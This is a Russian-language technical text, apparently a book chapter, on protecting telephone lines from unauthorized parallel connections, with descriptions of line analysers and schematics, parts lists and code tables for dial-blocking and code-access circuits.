Работа схемы заключается в следующем. При снятии трубки на ТА срабатывает датчик тока Rl, VT1 и с запаздыванием в 1 с (фильтр вызова) элемент DD2 подготавливается к счету. Элемент счетчика DD2 считает количество набранных цифр номера. Формирователь R5, С2, DD2.1 переключается в межсерийной паузе набора номера. После первых трех цифр высокий уровень на выходе 7 DD2 останавливает счет и, заряжая С4 через R7, переключает DD1.4, включая тем самым электронные часы. При входящей связи микросхема DD2 также подготавливается к счету, но импульсы набора номера в этом режиме отсутствуют. Электронные часы остаются в выключенном состоянии.

Таким образом, схема запуска позволяет избирательно отслеживать исходящую связь только с подключенного к ней телефонного аппарата.

Рис. 14 Схема запуска счетчика времени для фиксирования исходящей связи

Изображение: 

3.8. Специализированные анализаторы телефонных линий.

3.8. Специализированные анализаторы телефонных линий

В состав оборудования помещений кроссов АТС входят испытательно-измерительные столы (ИИС), предназначенные для производства эксплуатационных измерений и испытаний абонентских линий, телефонных аппаратов, абонентских комплектов АТС и соединительных проводов [4].

Оборудование ИИС для электромеханических станций можно разделить на пять основных частей:

• подключающее устройство для подключения ИИС к проверяемой соединительной (абонентской) линии;

• испытательная часть для определения

исправности абонентской линии, телефонного аппарата и абонентского комплекта АТС;

• измерительная часть для эксплуатационных измерений электрических параметров линии и ТА на постоянном токе;

• служебная часть для приема заявок и ведения разговора с абонентом и персоналом АТС;

• переговорное устройство для набора номера, приема и передачи разговора, используемое совместно с испытательной и служебной частью.

Ниже указаны технические возможности ИИС.

Подключающее устройство

Подключающее устройство позволяет осуществлять подключение ИИС к проверяемой линии либо с помощью приборов автоматической установки данных, путем набора номера проверяемого ТА, либо в кроссе с помощью испытательных шнуров. Автоматическое подключение возможно только к абонентским линиям, а с помощью шнуров — к любым соединительным линиям.

Испытательная часть

Испытательная часть ИИС позволяет:

• вызывать абонента, у которого положена трубка, индукторным током;

• вызывать абонента, у которого снята трубка, фоническим сигналом нарастающей громкости;

• контролировать прохождение установления

соединения и разговора по проверяемой линии;

• вызывать по проверяемой линии станцию и

набирать любой номер;

• вести переговоры по проверяемой линии как в сторону линии, так и станции;

• проверять качество разговорных цепей ТА путем введения в разговорный тракт во время разговора искусственной линии с затуханием 26 дБ;

• проверять правильность работы

номеронабирателя ТА, включенного в линию.

Измерительная часть

Измерительная часть позволяет:

• измерять омическое сопротивление шлейфа абонентской и соединительной линий (как двух, так и трехпроводной);

• измерять сопротивление изоляции между проводами А и Б абонентской линии, а также между любым проводом и землей в пределах до 1-10Ом;

• проверять наличие на проводах линии посторонней полярности путем измерения сопротивления изоляции между каждым проводом и минусом батарей АТС;

• проверять целостность конденсатора в телефонном аппарате абонента;

• проверять исправность защитных предохранителей кросса.

Структурная схема испытательно-измерительного стола приведена на Рис. 15.

3-81.jpg

В целом, ИИС позволяет проверить телефонную линию на предмет самовольного подключения во всех режимах работы телефонного аппарата. Электронные АТС последнего поколения имеют богатый набор сервисных функций, поэтому обнаружение нелегальных подключений значительно упрощается. Естественно, такую работу могут выполнить только работники АТС.

Представляется интересным, использовать для контроля линии приборы, разработанные специально для защиты информации [5]. Из всего объема данных, полученных с помощью таких специализированных тестеров, необходимо выбрать те, которые указывают на факты подключения к линии различных устройств, обрывы линии и т.п.

Для примера приведем некоторые характеристики таких приборов.

Набор для обнаружения PK1220-S

PK1220-S используется для незаметной проверки текущего состояния телефонной линии после установки устройства, например, когда линия свободна, идет разговор и звенит звонок. Это устройство работает по автоматической тестирующей программе, включающей отраженное, фазовое, угловое, I/U и высокочастотное измерение. Во время отраженного измерения любое подключение видно на встроенном мониторе с помощью измерительного сигнала на телефонной линии. Во время фазового углового измерения показывается любое РhТ-отклонение, происходящее от мощностного, индуктивного или реального оттока. РhТ-отклонение показывается с точностью 0,1%. Если предопределенный уровень превышен, PK1220-S испускает акустический сигнал 30 с. Оптический сигнал тревоги продолжается при интерференции и дальнейшая индикация показывает конец интерференции. Встроенная память тревоги начинает работу, когда регистрируется тревога, и затем хранит информацию о ней. Пользователь может стереть память тревоги. Гарантируется 24-часовая защита против встроенных систем перехвата. При I/U-измерении акустическим или оптическим сигналом показываются дополнительно встроенные элементы. Дополнительный контроль телефонного напряжения возможен с помощью U-измерения, т.к. это измерение отделяет телефонное напряжение от телефонной цепи и телефон работает через PK1220-S. Пользователь также может осуществлять акустоматическое программирование. Устройство может работать независимо от полярности.

Универсальный телефонный анализатор TS-12

Высокочувствительный и точный универсальный телефонный анализатор TS-12 предназначен для тестирования обыкновенных и электронных телефонов и

телефонных систем. Тестирует и обнаруживает все сигналы, даже те, которые исходят от лампочки или звонка вызова. Применяется для 50-проволочной кабельной системы, которая обычно используется вместе с 5-канальными установками. Позволяет проводить такие тестирования, как проверка напряжения при снятой и повешенной трубке, прослушивание линии, колебание тона, тестирование импульса высокого напряжения и различных видов прослушиваний. Все это может быть выполнено за одну минуту.

Быстрое сканирующее устройство DM-9

Использует измерение коэффициента отражения методом наблюдения за формой отраженного сигнала для обнаружения любого подключения к телефонной линии в радиусе 200 метров. Интерфейс упрощает эксплуатацию. Кабель может быть настроен при помощи одного нажатия кнопки. Функции; тестирование сканированием, проверка непрерывности, проверка проводов на выявление дефекта. Результаты тестирований выводятся на дисплей и пишутся на английском языке. Встроенные соединители BNC и RJ45. Питание от 9В батарейки или трансформатора, который поставляется по желанию. Включает укороченный разъем RJ45 и инструкции к применению.

Телефонный анализатор ТА17-С

Это устройство использует ряд электронных тестов для установления попыток вмешательства в телефонную сеть. Тест высокого напряжения обнаруживает высоковольтные мостики, диодные мостики, емкостные устройства связи, рычажно-переключательные защитные механизмы, стековые и триггерные устройства. Омметр с широким диапазоном обнаруживает устройства подключенные через сопротивление.Без каких-либо дополнительных устройств данное устройство проверяет

все типы телефонных аппаратов и систем, включая одиночные линии, пятилинейные клавишные аппараты, селекторы и телефоны "без рук". Применяется техника звукового зондирования, но если трубку на исследуемой линии поднимут, звук автоматически прекратится и раздастся слышный только проверяющему сигнал тревоги.

Естественно, здесь приведен не полный перечень специализированных приборов, позволяющих определить самовольное подключение к линиям. Необходимо акцентировать внимание, что все приборы, разработанные в целях защиты информации, можно так или иначе использовать для защиты от самовольного коммерческого использования линии.

Рис. 15 Структурная схема испытательно-измерительного стола

Изображение: 

4. Устройства активной технической защиты.

4. Устройства активной технической защиты.

 

 

Активная техническая защита телефонной линии от самовольного подключения предусматривает вмешательство в процесс установления и проведения связи с пиратского аппарата с целью предотвращения реальных финансовых затрат.

Все типы аппаратуры, реализующие активную защиту линий могут устанавливаться как на выходных клеммах АТС, так и на входе оконечных устройств, то-есть у абонента. Место установки блоков защиты определяется необходимостью решения тех или иных задач противодействия.

Преимуществом установки защитных устройств на кроссе АТС является охрана шлейфа АТС-абонент по всей его длине даже при его разрыве. Недостатком является невозможность абонентом самостоятельно определять тактику защиты.

Преимуществом индивидуальной установки блоков является: свобода в выборе устройств защиты, оперативность реагирования на все случаи самовольных подключений, а также, что немаловажно, невмешательство в протокол работы АТС. Недостаток заключается в невозможности контролировать всю длину шлейфа, особенно при его обрыве.

Именно поэтому, для разработчика аппаратуры активной защиты определяющим является постановка задачи противодействия. Наиболее реальная для

большинства пользователей АТС задача формулируется следующим образом: в случае самовольных подключений, финансовые потери необходимо свести к минимуму, не стремясь к их абсолютному исчезновению.

Существует две степени эффективности применения активных средств защиты:

• срыв пиратского подключения — 100% исчезновение финансовых потерь;

• затруднение пиратского подключения —

снижение потерь в два раза.

Следует отметить, что борьба "брони и снаряда" в сфере пиратства еще не закончена, поэтому, если удалось достигнуть степени затруднения. — это уже большой успех. Естественно, определяя эффективность защиты таким образом, мы усредняем все случаи воровства телефонного времени. Для какого-то из абонентов установка простейшего блока защиты может оказаться на 100% эффективной, но только на конкретный период времени.

4.1. Способы запрета набора номера.

4.1. Способы запрета набора номера

Вмешательство в процесс связи подразумевает реализацию функции запрета набора номера. Для проводных линии связи существует несколько основных способов запрета набора номера.

• Кратковременный разрыв линии с целью установки аппаратуры АТС в исходное состояние (линия свободна). Подразумевается разрыв одного из линейных проводов на время большее 400-800 мс (по ГОСТ 7153).

• Шунтирование линии резистивно-емкостной цепью. В этом случае, с помощью резистора ограничивается амплитуда импульсов набора номера, что не позволяет АТС определить номер и осуществить соединение, а емкость предназначена для гашения посылок тонового (частотного или DTMF) набора, а также подавления разговора, если соединение все-же состоялось.

• Помехи импульсному и частотному набору номера. Подразумевается искажение формы импульсов набора, уменьшение их количества и т.п., что также не позволяет однозначно определить номер и установить связь.

На Рис. 16 приведена схема ключа на разрыв линии.

4-11.jpg

В состав схемы входят:

• MOCT—VD1-VD4;

• ключ—DA1;

• зарядная цепочка — С 1, R 1;

• выпрямительный диод — VD5;

• развязывающая цепь R2, С2, R3.

В исходном состоянии (когда от генератора поступает последовательность импульсов запуска) ключ DA1 открыт, так как падение напряжения на цепи Cl, R1 равно напряжению открывания DA1. Соответственно, открыт мост VD1-VD4, и положительный линейный провод замкнут накоротко через прямые переходы диодов VD1-VD4. При необходимости осуществить разрыв линии прекращают подачу импульсов запуска от генератора. Емкость Cl разряжается через сопротивление R1, ключ DA1 закрывается, и, соответственно, закрывается мост VD1, VD4, разрывая, тем самым, плюсовую линейную

шину. Время разрыва определяется управляющим внешним устройством, необходимо только учесть время реакции цепи R1 Cl.

Данная схема может устанавливаться на любом участке шлейфа АТС-абонент. Управляющее устройство может быть запитано от самой АТС.

На Рис. 17 приведена схема шунтирования линии резистивно-емкостной цепью.

4-12.jpg

В состав схемы входят:

• мост—VD1-VD4;

• ключ—DA1;

• специально рассчитанная резистивно-емкостная цепь RC.

В исходном состоянии, когда линия свободна, на вход DA1 подается логический "ноль" от внешнего управляющего устройства. В этом состоянии нагрузка RC не шунтирует линию. При практическом использовании этой схемы необходимо учитывать, что на ключ DA1 через

емкость С может бьгть. приложено напряжение от 100 до 200 В (при вызове с АТС), в этом случае желательно применять ключи типа КР1014КТ1В, имеющие повышенное напряжение пробоя, или любой другой высоковольтный транзистор, выдерживающий напряжение до 200 В.

4-13.jpg

При необходимости запрета набора номера на управляющий вход DA1 подается логическая "единица" (2,5-4,5 В). Набор номера на параллельно подключенном телефонном аппарате становится невозможен. Емкость С = 220 мкФ обеспечивает подавление импульсов тонового набора не менее чем на 20 дБ, чего достаточно для того, чтобы номер не воспринимался аппаратурой АТС. Сопротивление R = 2 кОм ограничивает амплитуду импульсного набора до -25 В, чего также достаточно для любого защитного устройства.

На Рис. 18 приведена схема формирования помех импульсному набору номера.

Схема отличается от обычного ключа тем, что в ней отсутствует емкость С, а также наличием генератора Fг частотой 20-100 Гц, который непосредственно управляет ключем DA1. Применение этой схемы позволяет в промежутках между замыканиями линии на сопротивление R контролировать состояние линии (освободил ее пират или нет). Защитные свойства схемы также хороши — набор номера с параллельного аппарата невозможен.

Все описанные выше схемы, в принципе, могут быть установлены на любом участке линии АТС-абонент (в зависимости от конкретной схемы защитного устройства).

Рис. 16 Схема ключа на разрыв линии

Изображение: 

Рис. 17 Схема шунтирования линии резистивно-емкостной цепью

Изображение: 

Рис. 18 Схема формирования помех импульсному набору номера

Изображение: 

4.10. Прием двухзначного кода в DTMF-форме.

4.10. Прием двухзначного кода в DTMF-форме

Когда телефонная линия позволяет осуществить набор номера в частотной форме (ЧНН или DTMF код), устройство защиты также может быть выполнено в виде DTMF-приемника. Наиболее просто эта задача решается с помощью специализированной микросхемы 1008ВЖ18.

На Рис. 27 приведена принципиальная схема блокиратора частотного набора номера с двухзначным DTMF кодом.

В состав схемы входят:

• датчик напряжения линии — VD 1, R1, VD3, R2,DD1.1;

• узел подготовки приема кода — VD5, R4, R5, C2,DD1.2,DD1.3,DA1;

• DTMF-приемники с дешифратором — DD2, DD3;

• узел приема первой цифры — SA2, R14, R15, VD9, С6, DD4.5;

• узел приема второй цифры — SA1, VD8, R13, С5, DD4.3, DD4.4;

• узел временного включения запрета частотного набора — R11, С8, DD4.1, DD4.2, R12;

• ключ запрета — DA2;

• шунтирующая емкость — С7;

• цепь питания узла подготовки приема кода — VD2,R3,C1,VD4;

• элемент питания (9В) DTMF-приемника и декодера.

Принцип работы схемы заключается в следующем.

Подготовка к приему кода

В исходном состоянии ключ DA1 разомкнут, и все микросхемы DTMF-приемника и декодера отключены от элемента питания 9 В по минусовой цепи. При снятии трубки на аппарате ТА через время -1-1,5 секунды ключ DA1 включается "единицей" с выхода 10 DD1.2. DTMF-приемник DD2 готов к приему двух цифр двухчастотного кода. Цепочка R5, С2 предотвращает срабатывание элементов DD1.2, DD1.3 при приеме посылки вызова с АТС.

Прием кода

Микросхема DD2 осуществляет прием DTMF кода через СЗ, R7. На выходе дешифратора DD3 появляется высокий уровень, соответствующий набранной на тастатуре ТА цифре. Раскодировка первой и второй цифры реализованы аналогично схеме, описанной в предыдущем разделе (устройство защиты с двухзначным импульсным кодом). В случае правильного приема двух цифр кода, диод VD11 блокирует включение ключа защиты DA2.

Временное включение запрета

После приема первой цифры кода на выходе 3 DD3 появляется высокий уровень, и начинается заряд емкости С8 через R11. Приблизительно через 5 секунд, через R12, происходит включение ключа запрета DA2. Линия шунтируется специально расчитанной емкостью С7, что обеспечивает подавление дальнейших DTMF-посылок набора более чем на 20 дБ. Это не позволяет аппаратуре АТС однозначно воспринять номер в частотной форме.

4-101.jpg

Таблица 4. Список деталей схемы устройства кодированного доступа к линии двухзначным DTMF-кодом.

Элемент схемы

Номинал

DA1.DA2

1014КТ1А-В

R1

10М

DD1

К561ЛА7

R2

DD2

1008ВЖ18

R3

390К

DD3

К561ИД1

R4

5.6М

DD4

К561ЛН2

R5

ZQ1

3579,5 кГц

R6

1,5М

VD1.VD2

КД102А

R7

100К

VD3,VD4

Д814А1

R8

100К

VD7

КС 147

R9

З00К

VD5,VD6,VD8-VD12

КД522Б

R10

С1

220,0 мкФх 10В

R11

4.7М

С2

1,0 мкФ

R12

1,5М

СЗ.С4

0,1 мкФ

R13

С5,С6,С8

1,ОмкФ

R14

С7

220,0 мкФх 10В

R15

100К


Отключение системы запрета

После того, как трубка будет положена на аппарат, напряжение на С7 будет плавно нарастать до значения 60 В, что, в свою очередь, вызовет переход датчика напряжения DD1.1 в исходное состояние, разряд емкости С2 через R4 и, далее, отключение DA1 (а значит отключение микросхем DD2, DD3, DD4 от источника питания 9 В). Схема переходит в исходное состояние.

Для правильного применения блокиратора

частотного набора необходимо выполнять схожий с предыдущей схемой алгоритм:

• снять трубку ТА, услышать ответ станции 425 Гц;

• выдержать паузу 2-3 секунды;

• набрать код на тастатуре ТА (естественно, аппарат должен быть переключен в режим тонового набора — набора номера в DTMF форме);

• осуществить кратковременный сброс линии и вновь дождаться сигнала ответа станции 425 Гц;

• набрать необходимый номер и установить связь.

Следует учитывать невозможность запитывания микросхемы DD2 от телефонной линии, так как она потребляет более 10 мА, поэтому в схеме применяется два источника питания:

• от линии, для питания DD1 — С1, VD4;

• от элемента 9 В, для питания DD2, DD3, DD4. Данная схема может рассматриваться как модельная для конструирования устройств защиты с DTMF-кодом, а также — как отдельное устройство для избирательной защиты телефонных аппаратов, работающих только в тоновом (DTMF) режиме.

Таблица 4. Список деталей схемы устройства кодированного доступа к линии двухзначным DTMF-кодом.

Изображение: 

4.11. Схема кодового доступа к телефонной линии с 3-х значным последовательным кодом.

4.11. Схема кодового доступа к телефонной линии с 3-х значным последовательным кодом

Данное устройство подробно описано в [2]. Особенностями схемы являются:

• наличие внутреннего источника питания для подключения к ТА и формирования импульсов кода;

• полное отключение телефона в случае

неправильного приема кодовой посылки. Устройство кодового доступа может применяться как для защиты проводных линий связи (с небольшой длиной шлейфа), так и для защиты радиотелефонов в случае установки вблизи базового блока. Код меняется механическим путем (подключением соответствующих выходов микросхем).

В состав схемы входят:

• дешифратор — DD 1, DD2, DD3;

• узел приема посылки вызова с АТС — Cl, R2, VD1, VD2, С2, VD3, DD6.1, VD5;

• узел приема импульсов кода — DD6.4, DD6.3, С5, С4, VD6, R6, R7;

• ключ подключения телефона к линии — VD27-VD30, DA1 с элементами управления R14, VD25, R15, VD26, С16, VD24, VT2, R16, DD4.4;

• источник питания схемы 8В — VD33, R23, C18.VD34;

• внутренний источник питания 40-60В для формирования импульсов кода на элементах VD32, R22, С17, VD31, R20;

• встроенные ловушки R9, С6, R13, Cl I, R19, С14.

Принцип работы схемы заключается в следующем.

По наличию счетчиков DD1-DD3 можно сделать вывод, что данная схема предназначена для приема и дешифрации 3-х значного кода (999 вариантов). Счетчики работают последовательно, при правильной первой цифре счетчик DD1 фиксирует свое состояние через диод VD 10, разрешая счет (прием второй цифры) за счет появления низкого уровня на выходе элемента DD4.1, входе 15 DD2. Далее, при правильном наборе второй цифры счетчик DD2 фиксирует свое состояние через диод VD 18, разрешая счет микросхеме DD3. И далее, если код принят правильно в целом, на выходе элемента DD5.4 появляется напряжение логической единицы, которое через DD4.4 закрывает VT2, открывая таким образом DA1, и мост VD27-VD30 подключает телефон ТА к линии.

В исходном состоянии ключ DA1 закрыт, и телефон ТА подключен лишь к внутреннему источнику питания (VD32, R22, С17, VD31, R20). При снятии трубки телефона (в любом режиме: входящая или исходящая связь) с помощью делителя R5, R4 счетчик DD1 подготавливается к счету (приему 1-й цифры кода). Во время счета, чтобы микросхема DD1 не обнулилась, через цепочку RIO, C7, VD14, VD15, С9, DD4.3 происходит поддержание логического нуля на входе 15 DD1. Одновременно через DD6.2, R3, VT1, VD7 запирается входной узел.

При входящей связи посылка вызова 25 Гц поступает для формирования на входной узел Rl, Cl, R2, VD1, VD2, С2, VD3 и через DD6.1, VD5 приоткрывает в такт поступления посылок вызова с АТС ключ DA1, VD27-VD30, пропуская переменное напряжение вызова на телефон ТА, но в паузе между звонками вновь закрывает ключ DA1. Таким образом, снимая трубку ТА при поступлении вызова в паузе между звонками, чтобы телефон "схватил" линию необходимо набрать код. Цепочки ловушек R9 С6, R13 С11, R19 С14 расчитаны

таким образом, чтобы исключить возможность последовательного подбора кода.

Изменение кода производится механически путем подключения входов DD4.1, DD5.1, DD5.3 к выходам соответствующих счетчиков. При указанных на схеме номерах выводов код допуска в линию — 326. Изменение кода можно произвести с помощью таблицы (Таблица 5).

Подключение элементов ловушек производится на любые свободные выходы DD1-DD3. При неправильном наборе какой-либо цифры кода соответствующая микросхема счетчика блокируется, и повторный набор кода возможен после того, как трубка положена на аппарат, и выдержана пауза в 10-15 с. Длительность паузы определяется емкостью СЗ. Данная схема расчитана на небольшую длину охраняемого шлейфа (до 200 м), вследствие того, что источник питания С 17 запитывается от линии (т.е. расчитан на достаточно низкий ток потребления).

Размер платы 100х60 мм, подключение к линии осуществляется тремя разъемами. Единственным условием является использование телефонов II, III групп сложности с потреблением от линии не более 50-80 мкА.

В режиме ожидания вызова вся схема потребляет не более 50 мкА, а в режиме приема вызова или обработки кода до 150-200 мкА. Номиналы элементов приведены в таблице 6.

4-111.jpg

Таблица 5. Правила задания кода доступа.

Первая цифра

Вторая цифра

Третья цифра

номер выхода DD1

Код

номер выхода DD2

Код

номер выхода DD3

Код

2

1

2

1

2

1

4

2

4

2

4

2

7

3

7

3

7

1

10

4

10

4

10

4

1

5

1

5

1

5

5

6

5

6

5

6

6

7

6

7

6

7

9

8

9

8

9

8

11

9

11

9

11

9



Таблица 6. Список деталей системы кодового доступа.

Микросхемы

DD1.DD2.DD3

К561ИЕ8

DD4, DD5, DD6

КР561ЛА7

DA1

КР1014КТ1А(В)

Транзисторы

VT1

КТ315Г

VT2

КТ503Е(КТ315И)

Стабилитроны

VD3, VD4, VD6,VD14, VD26, VD34

Д814А1

Диоды

VD1, VD2, VD7, VD8, VD24, VD25,VD27-VD30,VD31, VD32, VD33

КД102А

Конденсаторы

С1.С2.С4, С7.С10.С13, С16, С9

ЮООпф

СЗ, С5.С8.С12.С15

0.1мкФ

С6, С11, С14

0.68мкФ

С17

10.0ОмкФхбЗВ

С18

2200.0мкФх10В

Резисторы

R1.R8.R12, R18.R11.R17, R21, R10

4.7М

R2, R3, R4, R7

1.5М

R6, R9, R13, R19, R16, R14

390К

R5

10М

R15, R20, R23

130К


Таблица 5. Правила задания кода доступа.

Изображение: 

4.12. Совмещение схем защиты с блокиратором параллельного телефона.

4.12. Совмещение схем защиты с блокиратором параллельного телефона

Составной частью комплекса мероприятий по предотвращению нелегального коммерческого использования телефонных линий является ограничение доступа к ним посторонних лиц. Зачастую, проблема доступа возникает при эксплуатации на одной линии нескольких параллельных телефонных аппаратов. В этом случае кроме обычных неприятных моментов (таких как :

прослушивание разговора, подзвякивание телефона во время набора номера на параллельном аппарате и т.п.) возникает возможность беспрепятственной городской и междугородней связи с любого параллельного аппарата. Если счета на оплату разговоров не персонифицируются, то это позволяет проводить свои личные разговоры за счет предприятия, фирмы и т.д.

Одним из вариантов решения задачи по защите линий является использование совмещенных схем блокираторов параллельного телефона и различных устройств защиты (запрет набора номера, запрет междугородней связи и т.п.).

На Рис. 29 приведена функциональная схема блокировки набора номера для параллельного телефонного аппарата.

4-121.jpg

Особенностью схемы является беспрепятственное прохождение сигнала вызова на оба ТА, подключенных через блокиратор 1х2. При исходящей связи подъем трубки на основном ТА приводит к обесточиванию цепи второго дополнительного телефона, а также схемы блокировки набора номера (в качестве которой может выступать схема защиты любого типа). Такой подход позволяет избирательно подключать устройства защиты на любой ТА.

В качестве примера рассмотрим принципиальную схему блокировки (запрета) набора номера для параллельного ТА, приведенную на Рис. 30.

В соответствии с данной схемой основной телефонный аппарат ТА1 обладает возможностью как

входящей, так и исходящей (оплачиваемой) связи без ограничений. В свою очередь, для дополнительного параллельного ТА2 остается только входящая (бесплатная) связь. При этом разговоры абонентов ТА1 и ТА2 взаимно не прослушиваются.

В состав схемы входят следующие каскады.

1) Блокиратор параллельного телефона:

• ключи блокировки—DA1,DA2;

• датчики тока — R1,R2;

• узлы формирования — VT1, R3, VT2, R4, DD1.1.DD1.4;

• цепи фильтрации вызова 25 Гц — R5, С1, R6,C2,DD1.2,DD1.3;

• цепь питания от телефонной линии — VD 1, R9, СЗ, VD2.

2) Телефонные аппараты:

• ТА1—основной;

• ТА2 — дополнительный.

3) Схема запрета набора номера:

• ключ блокировки—DA3;

• нагрузочное сопротивление—R 10;

• цепь включения запрета — DD2.1, R11. Работа схемы происходит следующим образом.

Входящая связь

При поступлении вызова с АТС звонят оба телефонных аппарата ТА1, ТА2, так как ключи DA1, DA2 открыты положительным напряжением, поступающим с выходов DD1.2, DD1.3. Цепи фильтрации вызова R5, С1, R6, С2 не позволяют переключить элементы DD1.2 и DD1.3 с единицы в ноль во время вызова 25 Гц, 100В с АТС. Ключ DA3, соответственно, разомкнут и схема запрета набора номера отключена.

Если трубка была снята на ТА2, ключ DA3 подключает нагрузочное сопротивление R 10 параллельно

линии, что несколько снижает громкость разговора (-10%), но в целом не оказывает серьезного влияния на входящую связь.

При снятии трубки на ТА1 ключи DA3, DA2 разомкнуты, схема запрета и телефон ТА2 выключены и, соответственно, входящая связь для ТА1 остается без изменений.

Исходящая связь с ТА1

Аналогично режиму входящей связи, при снятии трубки на ТА1 схема запрета и телефон ТА2 отключены от линии, поэтому связь для ТА1 проходит без каких-либо ограничений.

Исходящая связь с ТА2

При подъеме трубки на ТА2 элемент DD1.3 переключается в ноль (~ через 1,5-2 с), отключая тем самым ТА1 (DA1) и включая схему запрета номера (DA3, R10). Набор номера для ТА2 становится невозможен.

Количество телефонных аппаратов в данной схеме можно увеличить, подключая их в различных точках схемы (например, параллельно входящей линии, параллельно ТА1 или ТА2), получая таким образом различные комбинации функций запрета и разрешения связи для нескольких телефонов. Комбинируя несколько блокираторов параллельного телефона и несколько различных схем защиты, можно получить разветвленные цепочки подключения нескольких ТА с разными приоритетами исходящей связи. На Рис. 31 приведена функциональная схема включения трех ТА с различными схемами защиты.

По этой схеме:

ТА1 — входящая и исходящая связь без ограничений;

ТА2 — запрет исходящей междугородной связи;

ТАЗ — запрет любой исходящей связи, входящая

без ограничений.

Таким образом, совмещение схем блокираторов и защиты является одним из способов реальной технической (активной) защиты линий от самовольного использования.

4-122.jpg

4-123.jpg

включение трех ТА

Изображение: 

схема блокировки

Изображение: 

функциональная схема блокировки ТА

Изображение: 

4.2. Схема защиты от параллельного подключения, выполненная в виде "ЗАГЛУШКИ".

4.2. Схема защиты от параллельного подключения, выполненная в виде "заглушки"

При неиспользовании абонентом основного телефонного аппарата в течение длительного времени (командировка, выход в город и т.п.) рекомендуется использовать простейшие средства защиты линии от параллельного подключения (т.е. без разрыва шлейфа АТС-абонент).

Такие устройства должны выполнять две основные функции:

• при попытке набора номера с параллельно-подключенного аппарата осуществить запрет набора методом шунтирования линии;

• при приеме посылок вызова от АТС (100 В, 25 Гц) устройство не должно шунтировать линию (система запрета не включается).

На Рис. 19 приведена принципиальная схема устройства защиты от параллельного подключения.

Блок защиты оснащается разъемом, который включается в телефонную розетку вместо основного ТА (ч .с. выполняется в виде "заглушки").

В состав схемы входят:

• диодный мост — VD 1 -VD4;

• датчик напряжения VD5, Rl, VD6, R2, DD1.1;

• фильтр вызова АТС—R3,C1,DD1.2;

• инвертор — DD 1.3;

• ключ—DA1;

• нагрузочное сопротивление — R5;

• цепи питания микросхем — VD7, R6, С2, VD8.

Работа схемы достаточно проста.

В исходном состоянии, когда на линии присутствует напряжение около 60 В, ключ DA1 разомкнут (на выходах 3 DD1.1, 10 DD1.3 уровень логического "нуля").

При попытке набора номера с запаздыванием около 2 с (цепь R3С1) включается ключ DA1, осуществляющий шунтирование линии сопротивлением R5 (запрет дальнейшего набора). Сопротивление R5 необходимо подобрать таким образом, чтобы, когда пиратский телефон будет отключен от линии, напряжение в ней выросло настолько, чтобы узел контроля напряжения на DD1.1 отработал отбой запрета, т.е. переключил элементы DD1.1-DD1.3 в исходное состояние. Ориентировочное значение R5 составляет 2-3 кОм.

При приеме посылок вызова с АТС цепочка R3 С1 не позволяет переключить элементы DD1.2, DD1.3, и линия остается свободной. Диодный мост VD1-VD4 позволяет подключать устройство к телефонной линии без учета полярности.

4-21.jpg

Рис. 19 Схема защиты от параллельного подключения в виде "заглушки"

Изображение: 

4.3. Автоматический блок защиты от параллельного подключения.

4.3. Автоматический блок защиты от параллельного подключения

При необходимости эксплуатации блока защиты совместно с основным телефонным аппаратом он должен выполнять следующие функции:

• запрет набора номера в случае параллельного набора;

• отсутствие шунтирования линии при приеме посылок вызова с АТС;

• автоматическое отключение системы запрета набора номера при поднятии трубки основного ТА.

Принципиальная схема устройства, реализующего эти функции приведена на Рис. 20. В состав схемы входят:

• датчик напряжения — VD 1, R3, VD2, DD 1.1;

• схема автоматического обнуления — R4, VD3, DD1.2, С2, VD4, R5, СЗ, VD5;

• датчик тока — R6, VT1;

• фильтр вызова — С 1;

• цепь питания — VD6, R8, С4, VD7.

• ключ запрета — DA 1;

• нагрузочное сопротивление — R1;

В исходном состоянии, когда трубка основного ТА положена на аппарат, на линии присутствует около 60 В, и на выходе 3 DD1.1 — уровень логического "нуля". Ключ DA1 разомкнут, линия свободна.

4-31.jpg

При попытке набора с параллельного аппарата, импульсы набора через R5, СЗ, VD4 заряжают емкость С2, что приводит к переключению элемента DD1.2. На выходе 4 DD1.2 появляется "ноль", и резистор R4 подключается параллельно С1. Пониженное напряжение в линии (15-20В) через делитель R3, R4 переключает элемент DD1.1. Ключ DA1 открывается, тем самым шунтируя линию сопротивлением R1. Дальнейший набор номера становится невозможным.

При приеме вызова с АТС емкость С 1 предотвращает срабатывание элемента DD1.1 (в этом режиме резистор R4 также подключается параллельно С1).

После прекращения набора номера на пиратском аппарате либо после его отключения от линии, емкость С2 постепенно разряжается через элемент DD1.2 (за 5-15 с), после чего элемент DD1.2 переключается в исходное состояние (на выходе 4 DD1.2 логическая "единица"), и далее, через VD1, R3, идет постепенный заряд емкости С1 до момента срабатывания DD1.1. Важно, что процесс заряда С1 идет при самом низком напряжении в телефонной линии, когда линия нагружена на R5. Таким образом, осуществляется процесс самоотключения ключа DA1 или обнуления блока защиты.

При необходимости позвонить по основному телефонному аппарату абонент просто снимает трубку ТА, в результате чего на датчике тока R6 выделяется напряжение, достаточное для срабатывания VT1, DD1.1 и далее по цепочке DD1.4. Выход 11 элемента DD1.4 закорачивает на корпус управляющий вход DA1, что приводит к принудительному отключению схемы запрета набора номера.

Блок защиты подключается в разрыв телефонной линии с соблюдением полярности и устанавливается вблизи основного ТА, например, в телефонной розетке.

Рис. 20 Автоматический блок защиты

Изображение: 

4.4. Световая сигнализация включения схемы запрета набора номера.

4.4. Световая сигнализация включения схемы запрета набора номера

Зачастую, необходим контроль срабатывания схемы защиты линии. На Рис. 21 приведена схема включения сигнального светодиода с питанием от телефонной линии.

4-41.jpg

В состав схемы входят:

• ключ—DA1;

• цепь сигнализации — R3, HL 1;

• шунтирующий резистор — R2. При включении ключа DA1 от внешней схемы управления светодиод HL1 загорается, что сигнализирует о запрете набора номера. Сопротивление R2, в принципе, необходимо как страхующий элемент на случай выхода из строя р-n перехода HL1. В этом случае, при отсутствии световой сигнализации шунтирующий резистор R2 продолжает выполнять функцию запрета.

Рис. 21 Схема световой сигнализации включения запрета набора номера

Изображение: 

4.5. Устройство блокировки цифры "8".

4.5. Устройство блокировки цифры "8"

На всех отечественных АТС доступ к автоматической междугородной и международной связи осуществляется через набор цифры "8". Если необходимо запретить только междугородную связь, обычный блок защиты от параллельного набора не подходит — он не обладает избирательностью.

На Рис. 22 показана принципиальная схема устройства блокировки цифры "8".

На схеме:

• мост униполярного включения — VD 1 -VD4;

• датчик напряжения—VD6, Rl, R2, VD5, DD1.1;

• цепь подготовки к запуску счетчика — R4, С2, DD1.2;

• счетчик — DD2;

• цепь включения запрета — R8, С4, DD1.3, DD1.4; '

• ключ—DA1;

• шунтирующее сопротивление — R5;

• цепь питания микросхем — VD7, R7, СЗ, VD8.

